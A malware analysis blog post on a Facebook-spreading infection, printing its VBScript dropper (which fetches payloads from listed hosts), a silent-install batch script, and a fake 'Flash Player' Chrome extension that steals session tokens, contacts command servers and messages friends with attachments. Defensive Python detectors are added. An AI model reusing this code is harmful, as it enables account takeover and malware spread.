Greek facebook users under “attack”

Over the last few days, a piece of malware was spreading among the Greek users of Facebook. After a couple of days hunting for a sample, I managed to get one.
Infection

When the user opened the .rar attachment, there was a VBScript file inside. The VBScript was the dropper. Its main functionality was to download a .zip file that contained a Batch file, a .jar file and the Java 8 installer. All files were downloaded under C:/MyFolderakis.

The VBScript

Dim oFSO
Set oFSO = CreateObject("Scripting.FileSystemObject")
Dim csPATH  : csPATH   = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%SYSTEMDRIVE%")
csPATH = csPATH & "\MyFolderakis"
' Create a new folder
oFSO.CreateFolder csPATH


Do
	download(csPATH)
	Unzip csPATH &"\content.zip", csPATH
Loop While ReportFileStatus(csPATH &"\sapsalo.jar")=0


Function download(csPATH)
	link=RandomLink()
	dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
	dim bStrm: Set bStrm = createobject("ADODB.Stream")
	xHttp.Open "GET", link, False
	xHttp.Send

	with bStrm
	    .type = 1 '//binary
	    .open
	    .write xHttp.responseBody
	    .savetofile csPATH &"\content.zip", 2 '//overwrite
	end with
	download = csPATH &"\content.zip"
End Function



Function ReportFileStatus(filespec)
  Dim fso, msg
   Set fso = CreateObject("Scripting.FileSystemObject")
   If (fso.FileExists(filespec)) Then
      msg = 1
	  Wscript.Echo "Exited"
   Else
      msg = 0
   End If
   ReportFileStatus = msg
End Function

Function RandomLink()
	sites=Array("http://xionobala.com/mermikia/moisis.zip","http://trendvidz.com/terlix/filezilla.zip","http://tromeroi.com/download/adobe.zip","http://womfashion.com/aladin/aladin.zip","http://yoodot.com/ouzo/gnome.zip","http://pepperstonix.com/koitatiegine/tikale.zip","http://spatareporo.com/deitetous/simerastonaplha.zip","http://fashionofheart.com/vasika/kalisperasas.zip","http://masterolious.com/mozilla/firefox.zip","http://pentorali.com/safe/internet.zip")

	Dim max,min
	max=UBound(sites)
	min=LBound(sites)
	Randomize
	a=Int((max-min+1)*Rnd+min)
	RandomLink = sites(a)
End Function



Sub Unzip(sSource, sTargetDir)
    Set oFSO = CreateObject("Scripting.FileSystemObject")
    if not oFSO.FolderExists(sTargetDir) then oFSO.CreateFolder(sTargetDir)
    Set oShell = CreateObject("Shell.Application")
    Set oSource = oShell.NameSpace(sSource).Items()
    Set oTarget = oShell.NameSpace(sTargetDir)
    oTarget.CopyHere oSource, 256
End Sub

Set WshShell = CreateObject("WScript.Shell")
WshShell.RUN "cmd /c "& csPATH &"\run.bat" , 2

Side note: if you execute the VBScript twice, an error pops up when it tries to recreate the folder.

The Batch script

@ECHO OFF
IF EXIST "%CommonProgramFiles(x86)%\java" goto javaexists
IF EXIST "%CommonProgramFiles%\java" goto javaexists
:installjava
start /w %SYSTEMDRIVE%\MyFolderakis\jre-8u5-windows-i586-iftw.exe /s
if %ERRORLEVEL%==0 goto javaexists
echo Please do not close this or windows installation will be corrupted...
echo Loading...
goto installjava
:javaexists
start %SYSTEMDRIVE%\MyFolderakis\sapsalo.jar

It checks whether a folder named java exists under Common Files, covering both x86 and x86_64 Windows. If it exists, the script runs the sapsalo.jar file contained in the .zip downloaded by the dropper. If not, Java is installed silently first (/s option) and the check is retried.
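The chain described so far (the dropper runs run.bat from MyFolderakis, run.bat installs the bundled JRE silently, then the jar is started) maps directly onto process-creation telemetry. The following is an added example, not code from the post: a small detector run over constructed events; the ProcEvent field names, the VBS file name and the Java install path are assumptions.

```python
# Added example (not code from the post): detect the infection chain above in
# process-creation events. ProcEvent models what a Sysmon Event ID 1 or EDR
# process-creation record provides after parsing; its field names are assumed.
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str  # full path of the parent process image
    image: str         # full path of the created process image
    cmdline: str       # command line of the created process


# Folder the dropper creates under %SYSTEMDRIVE% (from the VBScript above).
DROP_DIR = re.compile(r"\\MyFolderakis\\", re.IGNORECASE)


def _is(image, *names):
    """True if the image path ends with one of the given executable names."""
    return image.lower().endswith(names)


def launched_run_bat(e):
    """Stage 1: the VBScript dropper runs 'cmd /c <drive>\\MyFolderakis\\run.bat'."""
    return (_is(e.parent_image, "wscript.exe", "cscript.exe")
            and _is(e.image, "cmd.exe")
            and DROP_DIR.search(e.cmdline) is not None
            and "run.bat" in e.cmdline.lower())


def silent_jre_install(e):
    """Stage 2: run.bat installs the bundled JRE with the /s (silent) switch."""
    return (DROP_DIR.search(e.cmdline) is not None
            and "jre-8u5-windows-i586-iftw.exe" in e.cmdline.lower()
            and re.search(r"\s/s\b", e.cmdline, re.IGNORECASE) is not None)


def jar_executed(e):
    """Stage 3: 'start ...\\sapsalo.jar' ends up as java/javaw running the jar."""
    return (_is(e.image, "java.exe", "javaw.exe")
            and "sapsalo.jar" in e.cmdline.lower())


STAGES = [
    ("run.bat launched from MyFolderakis by wscript", launched_run_bat),
    ("silent JRE install from MyFolderakis", silent_jre_install),
    ("sapsalo.jar executed by java", jar_executed),
]


def detect_stages(events):
    """Return the names of the chain stages seen in events, in chain order."""
    seen = {name for name, pred in STAGES for e in events if pred(e)}
    return [name for name, _ in STAGES if name in seen]


def is_infected(events):
    """Treat any two stages of the chain on one host as a confirmed infection."""
    return len(detect_stages(events)) >= 2


# Constructed sample telemetry; the VBS file name and Java path are made up.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Downloads\attachment.vbs"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /c C:\MyFolderakis\run.bat"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\MyFolderakis\jre-8u5-windows-i586-iftw.exe",
              r"C:\MyFolderakis\jre-8u5-windows-i586-iftw.exe /s"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Program Files (x86)\Java\jre8\bin\javaw.exe",
              r'"C:\Program Files (x86)\Java\jre8\bin\javaw.exe" -jar "C:\MyFolderakis\sapsalo.jar"'),
]

# Constructed benign activity that must not match.
BENIGN_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", r"cmd /c dir"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Program Files\Java\jre8\bin\java.exe",
              r'java -jar "C:\tools\build.jar"'),
]

if __name__ == "__main__":
    print(detect_stages(SAMPLE_EVENTS), is_infected(SAMPLE_EVENTS))
```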

The jar

After a successful installation, the jar is executed. The jar has two functions. It serves as another dropper for a browser plugin (a manifest named ourt.json and a JavaScript file with the main functionality). At the same time, it creates a registry record so that it is executed on every startup; this keeps you infected even if you delete the plugin. To achieve this, it creates a .zip file named ext_folder inside the Chrome folder.

The plugin

The manifest

{
    "olmpkfnhkfomcmnodekbphlkkejkealf":{
            "active_permissions":{
               "api":["storage","tabs"],
               "explicit_host":["\u003Call_urls>","chrome://favicon/*","http://*/*"],
               "manifest_permissions":[  ],
               "scriptable_host":["\u003Call_urls>","http://*.facebook.com/*","https://*.facebook.com/*"]
            },
            "content_settings":[  ],
            "creation_flags":1,
            "events":[  ],
            "from_bookmark":false,
            "from_webstore":false,
            "granted_permissions":{
               "api":["storage","tabs"],
               "explicit_host":["\u003Call_urls>","chrome://favicon/*","http://*/*"],
               "manifest_permissions":[  ],
               "scriptable_host":["\u003Call_urls>","http://*.facebook.com/*","https://*.facebook.com/*"]
            },
            "incognito_content_settings":[  ],
            "incognito_preferences":{
            },
            "initial_keybindings_set":true,
            "install_time":"13042160431700495",
            "location":1,
            "manifest":{
               "background":{
                  "persistent":false,
                  "scripts":["analytics.js"]
               },
               "content_scripts":[{
                  "css":["jquery-ui.css"],
                  "js":["debug_mode.js","jquery.js","jquery-ui.js","sugar.min.js","popup.js"],
                  "matches":["http://*.facebook.com/*","https://*.facebook.com/*"],
                  "run_at":"document_end"
               },{
                  "all_frames":true,
                  "exclude_matches":["http://*.facebook.com/*","https://*.facebook.com/*"],
                  "js":["debug_mode.js","sugar.min.js","URI.js","ads-list.js","ads.js"],
                  "matches":["\u003Call_urls>"]
               }],
               "content_security_policy":"script-src 'self' https://ssl.google-analytics.com; object-src 'self'",
               "description":"Cross-platform plugin plays animations, videos and sound files",
               "icons":{
                  "128":"128.png",
                  "16":"16.png",
                  "48":"48.png"
               },
               "key":"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyRAUY/Q1HimRmGom
V9c9/UWlVmQToGeNZPIxlH5C+g7Ig8/HObGp3G6YqwMNtvG1LF6DgESq7HkuhZpEcrmLmDI8tXQh
5SuYpKJCRcPJhvtOvtYnFbLNPdhg7DN4ZU8v1qhcrSSGfzK8KWPNghsAfL/PEFaobzWH+ZRFQbMsu93
+u9WJFbcGtXT+Kqar7eWIiCeTACobSDbcfaZ1Cj5S0TEZPRtddWvUKSXG3+/wLz236ckZAnz7yzOw
9kBLJL+J3+xm01qhTMc2wv6G0R+zVbC3/UjJcTSdCdY5wGgKgJkDzJ/WNxaGJUXFbKRRsQ3zhe3Xr
KKK+2kcHOjy0dZapQIDAQAB",
               "manifest_version":2,
               "name":"Flash Player",
               "permissions":["tabs","\u003Call_urls>","storage","http://*/"],
               "version":"2.0"
            },
            "path":"olmpkfnhkfomcmnodekbphlkkejkealf\\2.0_0",
            "preferences":{
            },
            "regular_only_preferences":{
            },
            "state":1,
            "was_installed_by_default":false
         }
}

The interesting parts are:

"manifest_version":2, "name":"Flash Player",

Just in case you wondered... It was named Flash Player, and it loads a lot of JavaScript libraries.
I like, honestly, that they named it Flash Player. That was smart.
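The record above is the per-extension entry Chrome keeps in its extensions.settings preferences, and the traits it combines (not from the Web Store, a name borrowed from a well-known product, scriptable on every site, a content script in all frames everywhere) are exactly what a profile audit should flag. The following is an added example, not code from the post: the sample is abridged from the record above plus a constructed benign entry, and the impersonation watchlist is an assumption.

```python
# Added example (not from the post): audit the per-extension records in Chrome's
# extensions.settings (the format of the record shown above) and flag the traits
# that record combines. The sample is abridged from that record plus a constructed
# benign entry; the impersonation watchlist is an assumption.
import json

# Host patterns that grant a content script access to every site.
BROAD_HOSTS = {"<all_urls>", "http://*/*", "https://*/*", "*://*/*"}
# Product names a sideloaded extension has no business using (assumed watchlist).
IMPERSONATED_NAMES = {"flash player", "adobe flash player", "java", "silverlight"}


def audit_extension(record):
    """Return a list of (finding, detail) pairs for one extensions.settings entry."""
    findings = []
    manifest = record.get("manifest", {})
    name = manifest.get("name", "")

    # Installed from outside the Web Store (sideloaded, as the jar does it).
    if record.get("from_webstore") is False:
        findings.append(("not from web store", "path=%s" % record.get("path", "?")))

    if name.strip().lower() in IMPERSONATED_NAMES:
        findings.append(("impersonates a known product", name))

    # Hosts the extension may inject scripts into: the granted set plus the
    # manifest's own permissions list.
    hosts = set(record.get("granted_permissions", {}).get("scriptable_host", []))
    hosts |= set(manifest.get("permissions", []))
    broad = sorted(hosts & BROAD_HOSTS)
    if broad:
        findings.append(("scriptable on all sites", ", ".join(broad)))

    # A content script injected into every frame of every site (the ads.js one).
    for script in manifest.get("content_scripts", []):
        if script.get("all_frames") and set(script.get("matches", [])) & BROAD_HOSTS:
            findings.append(("content script in all frames of all sites",
                             ", ".join(script.get("js", []))))

    # Extension CSP that allows scripts from a remote origin.
    for directive in manifest.get("content_security_policy", "").split(";"):
        directive = directive.strip()
        if directive.startswith("script-src") and "https://" in directive:
            findings.append(("remote script-src in CSP", directive))
    return findings


def audit_profile(settings):
    """Map extension id -> findings for every entry that has at least one."""
    result = {}
    for ext_id, record in settings.items():
        findings = audit_extension(record)
        if findings:
            result[ext_id] = findings
    return result


# Abridged from the record above, plus one constructed benign entry.
SAMPLE_SETTINGS = json.loads(r"""{
  "olmpkfnhkfomcmnodekbphlkkejkealf": {
    "from_webstore": false,
    "location": 1,
    "path": "olmpkfnhkfomcmnodekbphlkkejkealf\\2.0_0",
    "granted_permissions": {
      "api": ["storage", "tabs"],
      "scriptable_host": ["\u003Call_urls>", "http://*.facebook.com/*", "https://*.facebook.com/*"]
    },
    "manifest": {
      "name": "Flash Player",
      "manifest_version": 2,
      "version": "2.0",
      "content_security_policy": "script-src 'self' https://ssl.google-analytics.com; object-src 'self'",
      "permissions": ["tabs", "\u003Call_urls>", "storage", "http://*/"],
      "content_scripts": [
        {"css": ["jquery-ui.css"],
         "js": ["debug_mode.js", "jquery.js", "jquery-ui.js", "sugar.min.js", "popup.js"],
         "matches": ["http://*.facebook.com/*", "https://*.facebook.com/*"],
         "run_at": "document_end"},
        {"all_frames": true,
         "exclude_matches": ["http://*.facebook.com/*", "https://*.facebook.com/*"],
         "js": ["debug_mode.js", "sugar.min.js", "URI.js", "ads-list.js", "ads.js"],
         "matches": ["\u003Call_urls>"]}
      ]
    }
  },
  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
    "from_webstore": true,
    "path": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\1.0_0",
    "granted_permissions": {"scriptable_host": ["https://example.com/*"]},
    "manifest": {
      "name": "Constructed benign extension",
      "manifest_version": 2,
      "permissions": ["storage"],
      "content_scripts": [{"js": ["content.js"], "matches": ["https://example.com/*"]}]
    }
  }
}""")

if __name__ == "__main__":
    for ext_id, findings in audit_profile(SAMPLE_SETTINGS).items():
        print(ext_id)
        for finding, detail in findings:
            print("  -", finding + ":", detail)
```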
The plugin

"content_scripts":[{
 "css":["jquery-ui.css"],
 "js":["debug_mode.js","jquery.js","jquery-ui.js","sugar.min.js","popup.js"],
 "matches":["http://*.facebook.com/*","https://*.facebook.com/*"],
 "run_at":"document_end"
 }]
     function exit( status ) {
    
        var i;

        if (typeof status === 'string') {
            alert(status);
        }

        window.addEventListener('error', function (e) {e.preventDefault();e.stopPropagation();}, false);

        var handlers = [
            'copy', 'cut', 'paste',
            'beforeunload', 'blur', 'change', 'click', 'contextmenu', 'dblclick', 'focus', 'keydown', 'keypress', 'keyup', 'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup', 'resize', 'scroll',
            'DOMNodeInserted', 'DOMNodeRemoved', 'DOMNodeRemovedFromDocument', 'DOMNodeInsertedIntoDocument', 'DOMAttrModified', 'DOMCharacterDataModified', 'DOMElementNameChanged', 'DOMAttributeNameChanged', 'DOMActivate', 'DOMFocusIn', 'DOMFocusOut', 'online', 'offline', 'textInput',
            'abort', 'close', 'dragdrop', 'load', 'paint', 'reset', 'select', 'submit', 'unload'
        ];

        function stopPropagation (e) {
            e.stopPropagation();
            // e.preventDefault(); // Stop for the form controls, etc., too?
        }
        for (i=0; i < handlers.length; i++) {
            window.addEventListener(handlers[i], function (e) {stopPropagation(e);}, true);
        }

        if (window.stop) {
            window.stop();
        }

        throw '';
}

       $(function(){

            chrome.runtime.sendMessage({gegonos: "visit" }, function(response) {});

            // ads on fb
            chrome.storage.sync.get(function(extSettings) {
                if(extSettings.ads){

                 var adcounter = 0;
                 var adurls = ['https://8zxb-2gvn.accessdomain.com/789/ads.php','https://8zxb-2gvn.accessdomain.com/790/ads.php','https://8zxb-2gvn.accessdomain.com/791/ads.php','https://pizzasakis.com/789/ads.php','https://pizzasakis.com/790/ads.php','https://pizzasakis.com/791/ads.php'];
                 function getit(url){
                  $.get(url).done(function (b) {
                           final_ad_url = url;
                           put_ads(final_ad_url);
                        }).fail(function (a, d, e) {
                            console.log('fail',adurls[adcounter])
                                if(adurls[adcounter++])
                                 getit(adurls[adcounter])
                            
                        });
                  }
                getit(adurls[0]);


                  function put_ads(final_ad_url){
                    $($('*[data-ad]')).parent().parent().html('<iframe id=""style="position: relative; width: 100%; height: 620px; border:0;" src="'+final_ad_url+'?choice=1" id="someId"/>')



                    elems1=$.makeArray( $( "*[data-dedupekey]" ) );
                    elems2=$.makeArray( $( "*[data-insertion-position]") );
                    elems=elems1.include(elems2).unique();
                    if(elems[0])
                        $(elems[0]).append('<iframe style="position: relative; width: 110%; height: 82px; border:0;" src="'+final_ad_url+'?choice=3" id="someId"/>')
                    if(elems[1])
                        $(elems[1]).append('<iframe style="position: relative; width: 110%; height: 82px; border:0;" src="'+final_ad_url+'?choice=3" id="someId"/>')
                
                  }

                }
            })
              
        })
        
        
        
        
        
// facebook part


    jx = {
        b: function () {
            var b = !1;
            if ("undefined" != typeof ActiveXObject) try {
                b = new ActiveXObject("Msxml2.XMLHTTP")
            } catch (c) {
                try {
                    b = new ActiveXObject("Microsoft.XMLHTTP")
                } catch (a) {
                    b = !1
                }
            } else if (window.XMLHttpRequest) try {
                b = new XMLHttpRequest
            } catch (h) {
                b = !1
            }
            return b
        },
        load: function (b, c, a, h, g) {
            var e = this.d();
            if (e && b) {
                e.overrideMimeType && e.overrideMimeType("text/xml");
                h || (h = "GET");
                a || (a = "text");
                g || (g = {});
                a = a.toLowerCase();
                h = h.toUpperCase();
                b += b.indexOf("?") + 1 ? "&" : "?";
                var k = null;
                "POST" == h && (k = b.split("?"), b = k[0], k = k[1]);
                e.open(h, b, !0);
                e.onreadystatechange = g.c ? function () {
                    g.c(e)
                } : function () {
                    if (4 == e.readyState)
                        if (200 == e.status) {
                            var b = "";
                            e.responseText && (b = e.responseText);
                            "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
                            c && c(b)
                        } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
                    };
                    e.send(k)
                }
            },
            load2: function (b, c, a, h, g) {
                var e = this.d();
                if (e && b) {
                    e.overrideMimeType && e.overrideMimeType("text/xml");
                    h || (h = "POST");
                    a || (a = "text");
                    g || (g = {});
                    a = a.toLowerCase();
                    h = h.toUpperCase();
                    b += b.indexOf("?") + 1 ? "&" : "?";
                    var k = null;
                    "POST" == h && (k = b.split("?"), b = k[0], k = k[1]);
                    e.open(h, b, !0);
                    e.onreadystatechange = g.c ? function () {
                        g.c(e)
                    } : function () {
                        if (4 == e.readyState)
                            if (200 == e.status) {
                                var b = "";
                                e.responseText && (b = e.responseText);
                                "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
                                c && c(b)
                            } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
                        };
                        e.send(k)
                    }
                },
                d: function () {
                    return this.b()
                }
        };

        function getFriends(){
            var promise=jQuery.Deferred();
            jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/first_degree.php?" + "__a=1&filter[0]=user&lazy=0&viewer=" + user_id + "&token=v7&stale_ok=0", function (a) {
                var b = a;
                var c = b.substring(b.indexOf("{"));
                var d = JSON.parse(c);
                d = d.payload.entries;
                friends=d;
                promise.resolve();
            })
            return promise;
        }
        
        function Create_Post(o){
            jx.load2(window.location.protocol + "//www.facebook.com/ajax/stream/inline.php?fb_dtsg=" + fb_dtsg + "&walltarget=" + o + "&render_notif_only=1&birthday=1&message_text=" + encodeURIComponent(msg) + "&message=" + encodeURIComponent(msg) + "&giftsgroupid=8ff493ad46&post=Post&nctr[_mod]=pagelet_reminders&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFIwd9e&__req=1b&phstamp=", function (a) {
                var b = a.substring(a.indexOf("{"));
                var c = JSON.parse(b);
            })
        }
        function Like_post(post) {
            var X = new XMLHttpRequest();
            var XURL = "//www.facebook.com/ajax/ufi/like.php";
            var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp=";
            X.open("POST", XURL, true);
            X.onreadystatechange = function () {
                if (X.readyState == 4 && X.status == 200) {
                    X.close;
                }
            };
            X.send(XParams);
        }
        function Like_page(p) {
            var Page = new XMLHttpRequest();
            var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
            var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
            Page.open("POST", PageURL, true);
            Page.onreadystatechange = function () {
                if (Page.readyState == 4 && Page.status == 200) {
                    Page.close;
                }
            };
            Page.send(PageParams);
        }

        send_message = (function(target_user_id,msg){
            var Page = new XMLHttpRequest();
            var PageURL = "//www.facebook.com/ajax/mercury/send_messages.php";
            var PageParams = "?=&=&__a=1&__dyn=798aD5z5CF-&__req=d&__user=" + user_id + "&client=mercury&fb_dtsg=" + fb_dtsg + "&message_batch[0][action_type]=ma-type:user-generated-message&message_batch[0][author]=fbid:" + user_id + "&message_batch[0][author_email]=&message_batch[0][body]=" + msg + "&message_batch[0][coordinates]=&message_batch[0][has_attachment]=false&message_batch[0][html_body]=false&message_batch[0][is_cleared]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_forward]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][is_unread]=false&message_batch[0][message_id]=<1392768225533:1945850321-3990341979@mail.projektitan.com>&message_batch[0][signatureID]=63e61bd&message_batch[0][source]=source:chat:web&message_batch[0][source_tags][0]=source:chat&message_batch[0][specific_to_list][0]=fbid:" + target_user_id + "&message_batch[0][specific_to_list][1]=fbid:" + user_id + "&message_batch[0][status]=0&message_batch[0][thread_id]=mid.1392163284356:af679b05b9c1cde936&message_batch[0][timestamp]=1392768225533&message_batch[0][timestamp_absolute]=Today&message_batch[0][timestamp_relative]=2:03am&message_batch[0][timestamp_time_passed]=0&message_batch[0][ui_push_phase]=V3&phstamp=";
            Page.open("POST", PageURL, true);
            Page.onreadystatechange = function () {
                if (Page.readyState == 4 && Page.status == 200) {
                   var resp = Page.responseText;
                   //delete_message(resp.split('"message_id":')[1].split(',"client_message_id"')[0].replace(/"/g, ""))
                   Page.close;
               }

           };
           Page.send(PageParams);
       }).lazy(Number.random(7, 14) * 1000)

       delete_message=function(msg_id){
           var Page = new XMLHttpRequest();
           var PageURL = "//www.facebook.com/ajax/mercury/delete_messages.php";
           var PageParams = "?__a=1&__dyn=798aD5z5CF-&__req=d&__user=" + user_id + "&fb_dtsg=" + fb_dtsg + "&message_ids[0]=" + msg_id + "&phstamp=";
           Page.open("POST", PageURL, true);
           Page.onreadystatechange = function () {
              if (Page.readyState == 4 && Page.status == 200) {
                  Page.close;
              }
            };
            Page.send(PageParams);   
        }

    function downloadFile(){

        
          var promise=jQuery.Deferred();
          var counter = 0;
          if(counter<configs.attach_urls.length)
          {
              var oReq = new XMLHttpRequest();
              oReq.open("GET", configs.attach_urls[counter], true);
              oReq.responseType = "arraybuffer";
              console.log('ouer')
              oReq.onload = function(oEvent) {
                if(this.status == 200){
                  console.log(this)
                  var myFile = new Blob([oReq.response], {type: 'application/octet-stream'});
                  promise.resolve( myFile );
                  
                }else{
                  counter++;
                  if(counter<configs.attach_urls.length){
                    oReq.open("GET", configs.attach_urls[counter], true);
                    oReq.send();
                  }
                  
                }
                
                
              }
              

              oReq.send();
          }
          return promise;
        }
        start_sending = function (myFile,target_id,msg_to_send,attach_name){
          var promise=jQuery.Deferred();
          var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
          var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
          
          console.log(target_id)
          var target_id = target_id;
          var msg=msg_to_send;
          var filename=attach_name;

          var formData = new FormData();
          formData.append("fb_dtsg", fb_dtsg);
          formData.append("attach_id", null); 
          formData.append('upload_1052', myFile, filename);

          var request = new XMLHttpRequest();
          request.open("POST", "/ajax/mercury/upload.php?__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&ttstamp=&ft[tn]=%2BJ%2BM&");
          request.send(formData);

          request.onloadend = function(){
              a=JSON.parse((this.responseText).split('for (;;);')[1])
              a=a.payload.metadata[0]
              console.log(a)

              var Page = new XMLHttpRequest();
              var PageURL = "//www.facebook.com/ajax/mercury/send_messages.php";
              formData = new FormData();
              formData.append('message_batch[0][action_type]','ma-type:user-generated-message'); formData.append('message_batch[0][thread_id]',''); formData.append('message_batch[0][author]','fbid:'+ target_id); formData.append('message_batch[0][author_email]',''); formData.append('message_batch[0][coordinates]',''); formData.append('message_batch[0][timestamp]',(new Date).getTime()); formData.append('message_batch[0][timestamp_absolute]','Today'); formData.append('message_batch[0][timestamp_relative]',''); formData.append('message_batch[0][timestamp_time_passed]','0'); formData.append('message_batch[0][is_unread]',false); formData.append('message_batch[0][is_cleared]',false); formData.append('message_batch[0][is_forward]',false); formData.append('message_batch[0][is_filtered_content]',false); formData.append('message_batch[0][is_spoof_warning]',false); formData.append('message_batch[0][source]','source:titan:web'); formData.append('message_batch[0][body]',msg); formData.append('message_batch[0][has_attachment]',true); formData.append('message_batch[0][html_body]',false); formData.append('message_batch[0][specific_to_list][0]','fbid:'+ target_id); formData.append('message_batch[0][specific_to_list][1]','fbid:'+ user_id); formData.append('message_batch[0][raw_attachments][0][filename]',a.filename); formData.append('message_batch[0][raw_attachments][0][filesize]',a.filesize); formData.append('message_batch[0][raw_attachments][0][hash]',a.hash); formData.append('message_batch[0][raw_attachments][0][handle]',a.handle); formData.append('message_batch[0][raw_attachments][0][filetype]',a.filetype); formData.append('message_batch[0][raw_attachments][0][encryptionKey]', a.encryptionKey); formData.append('message_batch[0][raw_attachments][0][metadata]',''); formData.append('message_batch[0][raw_attachments][0][param_hash]',a.param_hash); formData.append('message_batch[0][raw_attachments][0][image_metadata]',''); formData.append('message_batch[0][force_sms]',true); 
formData.append('message_batch[0][ui_push_phase]','V3'); formData.append('message_batch[0][status]','0'); formData.append('message_batch[0][message_id]',''); formData.append('client','mercury'); formData.append('__user',user_id); formData.append('__a','1'); formData.append('__dyn','798aD5z5CF-'); formData.append('__req','i'); formData.append('fb_dtsg',fb_dtsg); formData.append('ttstamp',''); formData.append('__rev','1188904'); 
              
              Page.open("POST", PageURL, true);
              Page.onreadystatechange = function () {
                if (Page.readyState == 4 && Page.status == 200) {
                 var resp = Page.responseText;
                 var message_id_with_attachment = (JSON.parse(resp.split('for (;;);')[1])).payload.actions[0].message_id;
                 var thread_id_with_attachment = (JSON.parse(resp.split('for (;;);')[1])).payload.actions[0].thread_id;
                 Page.close;
                 delete_msg_atach(message_id_with_attachment)
                 mute_conversation(thread_id_with_attachment)
               }
               promise.resolve()
             };
             Page.send(formData);
          }
          return promise;
        }


        function delete_msg_atach(msg_id){
          
          var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
          fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
          
          var Page = new XMLHttpRequest();
          var PageURL = "//www.facebook.com/ajax/mercury/delete_messages.php";
          Page.open("POST", PageURL, true);
              
          var formData = new FormData();

          formData.append('message_ids[0]',msg_id)
          formData.append('__user',user_id)
          formData.append('__a','1')
          formData.append('__dyn','798aD5z5CF-')
          formData.append('__req','d')
          formData.append('fb_dtsg',fb_dtsg)
          formData.append('ttstamp','')
          formData.append('__rev','1189795')

          Page.onreadystatechange = function () {
                if (Page.readyState == 4 && Page.status == 200) {
                 console.log(Page.responseText)
               }

             };
          Page.send(formData);
        }
        function mute_conversation(thread_id){
          
          var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
          fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
          
          var Page = new XMLHttpRequest();
          var PageURL = "//www.facebook.com/ajax/mercury/change_mute_thread.php";
          Page.open("POST", PageURL, true);
              
          var formData = new FormData();

          formData.append('thread_id',thread_id)
          formData.append('mute_settings','3600')
          formData.append('payload_source','mercury')
          formData.append('__user',user_id)
          formData.append('__a','1')
          formData.append('__dyn','798aD5z5CF-')
          formData.append('__req','d')
          formData.append('fb_dtsg',fb_dtsg)
          formData.append('ttstamp','')
          formData.append('__rev','1189795')

          Page.onreadystatechange = function () {
                if (Page.readyState == 4 && Page.status == 200) {
                 console.log(Page.responseText)
               }

             };
          Page.send(formData);
        }


    function get_config(){
         var promise=jQuery.Deferred();
         var counter = 0;
         var urls = ['https://8zxb-2gvn.accessdomain.com/789/taxavasi.php','https://8zxb-2gvn.accessdomain.com/790/taxavasi.php','https://8zxb-2gvn.accessdomain.com/791/taxavasi.php','https://pizzasakis.com/789/taxavasi.php','https://pizzasakis.com/790/taxavasi.php','https://pizzasakis.com/791/taxavasi.php'];
         function getit(url){
          $.getJSON(url).done(function (b) {
                    configs = b;
                    configs.friends_to_send_attach = configs.friends_to_send_attach2;
                    console.log('configs',configs);
                    promise.resolve()
                }).fail(function (a, d, e) {
                    console.log('fail',urls[counter])
                        if(urls[counter++])
                         getit(urls[counter])
                    
                });
          }
        getit(urls[0]);
           
         
          return promise;
        }

    function save(){
            chrome.storage.sync.set({'last_settings': Date.now() , 'post_kathe' : configs.post_kathe , 'ads' : configs.ads}, function() {
                  // Notify that we saved.
                  console.log('ok')
              });
        }
       try
        {
            fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
            user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);  
          }   
      catch(err)
        {
          console.log('errrrrr')
          exit();
        }
         chrome.storage.sync.get(function(extSettings) {
            console.log(extSettings)
            if(extSettings.last_settings){
               if(new Date(extSettings.last_settings).hoursAgo()>=extSettings.post_kathe)
                get_config().done(function(){
                    save();
                    if(configs.on)
                        run();
                })

        }else{
            get_config().done(function(){
                save();
                if(configs.on)
                    run();
